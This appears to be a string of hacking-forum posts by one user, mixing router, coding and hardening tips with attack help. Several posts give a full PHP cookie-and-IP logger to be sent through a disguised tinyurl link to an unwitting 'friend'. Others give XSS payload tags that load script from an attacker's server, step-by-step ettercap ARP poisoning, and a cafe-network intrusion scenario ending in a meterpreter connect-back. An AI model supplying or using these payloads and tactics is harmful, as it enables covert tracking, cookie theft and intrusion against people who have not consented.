DingleBerries

Links are appreciated when referencing a talk... you know, for those who havent seen it and may be able to shed light on the situation.

Install "Tamper Data", a firefox add-on. Go to the router config and start configuring a few things and looking at the POST commands going threw. Create a script to login to the router and then do what you want. If anything look at the cd that comes with them, thats how they set your SSID and what not without you logging into the web UI. I would help but I dont have either of those routers. I will look around and see what I can find.

why when you can just: wget -rp -H http://www.website.com curl -LO http://website.com/[2000:2500].jpg

Smoothwall + Python + Reading DDWRT documentation + http POST = a script to update all routers at once Smoothwall as the base firewall, Python to create a script that validates and post commands the the router. Use this as a rough example. No need in going out and buying more routers because if all you want to do is run "linux" well thats what ddwrt is. However, if you do go that path why not toss a few wrt54g's my way :P. Ill be more than happy to help you script it then. EDIT: just thought about this, but if ssh is open on all the routers then you cna just make a sh script to do this. Know that leaving ssh open is a bad security risk as well though. If the laptops are always in the same lab with the same router apply MAC filtering. If you are using windows you are in the suck since it doesnt look at an APs MAC address, just the SSID. Im sure there is a way to change this but i havent played with wireless function in windows in a LONG time. If someone knows where wireless zero config information is stored, the registry, a config.ini file i wouldnt mind looking more into this fix.

Run a script in front of the game, blocking all input, then kill it(or put it to sleep) after it has received the keys needed... think of GINA in windows. The problem with that is that when the person dies or time runs out how is the script going to restart its self? Best bet may be to redefine what keys the emulater uses, or block the input devices(there are settings somewhere, just dont feel like digging them up).

More Complex Step 1 Grap ARP Packet Step 2 Hex edit ARP Packet Step 3 Set up box settings for proper redirection of connectivity, SSLStrip, ect Step 4 File2Cable, doarp.sh Step 5 Sniff away, redirect, ect EASY Open ettercap ARP scan network Find Active machines Go to host tab Add default gateway to taget 1, Victim to target 2 Go to MITM tab and select ARP Poisoning

Or just upload you css and html for us to look at?

I can tell you dont know what you are doing so Im going to just spell it out. The Setup: Windows XP Box with internet access Apahe PHP Tinyurl.com Method 1: Create a page, index.php, and add this code: <?php $useragent = $_SERVER['HTTP_USER_AGENT']; $cookie = $_GET['cookie']; $httpreferrer = $_SERVER['HTTP_REFERER']; $HttpClientIP = $_SERVER['HTTP_CLIENT_IP']; $RemAddr = $_SERVER['REMOTE_ADDR']; $CacheControl = $_SERVER['HTTP_CACHE_CONTROL']; $XForward = $_SERVER['HTTP_X_FORWARDED_FOR']; $querystring = $_SERVER['QUERY_STRING']; $filename = 'log.txt'; $somecontent = "User Agent: $useragent\n Cookie: $cookie\n HTTP Referrer: $httpreferrer\n HTTP Client IP: $HttpClientIP\n Remote Addr ess: $RemAddr\n Cache Control: $CacheControl\n X Forward: $XForward\n Query String: $querystring\n"; if (is_writable($filename)) { if (!$handle = fopen($filename, 'a')) { echo "Cannot open file ($filename)"; exit; } if (fwrite($handle, $somecontent) === FALSE) { echo "Cannot write to file ($filename)"; exit; } echo "Success, wrote ($somecontent) to file ($filename)"; fclose($handle); } else { echo "The file $filename is not writable"; } ?> Change the url at tinyurl.com and send it to him, that will log all the info you need to log.txt in the same directory. Method 2: Find a site vulnerable to a xss attack. The .js is just a obfusication tecnique, you can insert what ever you want as long as the mark downloads it you are able to log that IP address. Set up an APACHE/PHP server locally, you can go out and find a free service but if its your friend and he knows your doing it then why bother? Open GIMP/PhotoShop and create a 1x1pixel illistration and save it host that one your server Add the location of the pixel to the xss monitor you hosts file and watch who downloads it. Most of this has to do with social engineering because you are sending them a link in hopes they will open it. The second method works with emails as well if they choose to view images. As for working this threw facebook, yes you can. There are sites out the dedicated to logging xss vulns found, just find a fresh one and do this.. easy as pie. Even with his IP i doubt you can do anything, if you have no clue as to how to find it what are you going to do when you do have it? Metasploit is good for picking up some older vulnerabilities and fusking with them but what if all he is running on his computer is a browser? What are you going to do then? "Hacking" isnt a point and click type ordeal.

Not going into detail but here are some starter points. For the XSS there are multiple methods. Yes you will need your own server, doesn't matter where its hosted. <script SRC=http://yourpage.com/xss.js></SCRIPT> in the xss.js load the image or just replace that script with where the image is. <EMBED SRC="yourpage.com/xss.swf" AllowScriptAccess="always"></EMBED> This is a good one because you can get myspace to load it, that way when he visits the ms page you can grab the ip. XSS is easy but it takes some social engineering. I suggest you start here and move up. The FTP trick is getting the guy to download and run a file, alot harder than the XSS because you can use tinyurl to mask you xss attack. Windows has a built in ftp upload command and that is why I say use ftp but any way you can make it work do it. You can also just a connect back trojan for this as well, but then you are giving him your ip, not very stealthy.

Python, C++, most all languages will do what you want. a = 1 b = 2 So read the name, translate, rename just leave out the characters M, P, 3 If I had time tonight I would... still not because its a bad idea.

On your server host a image, 1X1pixel, and either threw xss or som other means have him load that image. Look in your logs and there is his ip. Write a simple script to ftp upload a file containing his ip. How you make that file is another means. Instant Message him... Lots of ways to get this method to work, send file... Does he host anything on his computer, i.e personal home page? Ping hispage.com List goes on and on...

Well without the mouse i cannot test this out myself but what i think you should do is.... In the program folder you will find a config.xml, open it. Edit the lines: &lt;LED_COLOR&gt;47871&lt;/LED_COLOR&gt; &lt;LED_INTENSITY&gt;4&lt;/LED_INTENSITY&gt; &lt;LED_PULSATION&gt;3&lt;/LED_PULSATION&gt; Changing the application it uses will just require some hex editing.

Hey, thanks for the reply but i was right all along... just left out a header :P, too little sleep. I knew all my code was right but it just wouldnt compile. left out string.h

Ok I know this is horrible but i cant remember how to run dos commands in a string. Ive already looked and all I get are "use system()", but i cant. lol i got it.. #include <string>

Can you link directly to the drivers and download? You didnt state the exact model and that would help allot! Thanks

Any other admin accounts on the box?

You agreed to use their computers, therefore you agree to have everything you do logged by admins.

I was thinking about this and I have a few questions. Are you setting up vpns for individual VMs or to the main os? I cant do diagrams but by having a vpn to the core of the machine the person now has access to the main OS and can root it very easily. There is a RH exploit for escalation of privileges. But by having a team to verify people individually you can "almost" eliminate this threat. What is the main OS going to be? Think of using some sort of steady state for that and saving the VMs and configs for users on a different partition. My idea looks a bit like Partition 1 = Main OS Partition 2 = Swap(if linux, better yet just use a swap file... unless we have access to the main os) Partition 3 = VMs Partition 4 = User configs, VPN stuff Then if possible have Partition 4 mirrored or set to back up at certain intervals, that way if something happens you can restore it. On another note, this isnt going to be using you ip from your ISP is it? If so then be careful what you have on your network because you may get a few unsavoury persons attacking you directly. Other than that great idea!

Well rouguehart hasnt informed the forum about its where abouts so the best we can do is hope is still moving.

Thats my local con! I volunteered last year and plan on doing it again. Im shy so volunteering helps me get out and talk to people. Everyone there is awesome, just dont through a chair off the top of the building... The first thing you have to realise is that there are people who know alot, but you cant let that deter you. You go to these becaus you enjoy the atomsphere, the people, and mainly just have a passion for this(plus there are alot of great speakers). Not only do these events give you ideas, but they also help to teach you... I didnt know how metasploit worked until operat0r put on a little demo for the owning of the boxes. If anything just email me and we can meet up. It easier to get out and introduce your self when you are in a group. Cheers, hope to see you there.

A good Antivirus that you didnt download from tpb. NOD32 is really good. I dont know of any programs that can do what iptables does for linux, because im not a windows user, but something like that for a good firewall. Turn off services you do not need. Disable javascript in Adobe and everything elese for that matter. Do not run as Admin. Dont download warez. Thats all i can think of. I never really had problems with virii when i used windows but just use common sense. If you download a hack tool from a h4k3rz website then, yeah its probably back doored. Use the tried and true programs.

Metasploits good if they are running a vulnerable service.. if not then meterperter and some social engineering comes into play. Ettercap with some filters and meterperter is a really good way to start. There are so many tools that its hard to say, well get this and this and that. If you dont know how to use them then there is no use for them. Best thing to do is find a target, asses possible exploits, nmap, and go from there. Example: Local Cafe What can you do? Well, for starters ARP. Next run NMap and get a list of clients. Ok few targets running windows lets check their ports out. Ok so port 80 is open... nothing of interest. Can we ARP poison the network? Yes? Ok lets do that. Now we redirect there traffic to my local hosted site. Meterpeter some exploit to php or just have then download the file and RC back to you. There are other scenarios that are much more difficult but that is the easiest to explain, and possible the easiest to exploit.

I have a nice MD5 brute forcer but it doesnt support salts atm, not at that level yet, that could easily be made into a CUDA program. Im going to start reading a bit and see if i cant get it to work.

Not to mention you risk breaking the entire network.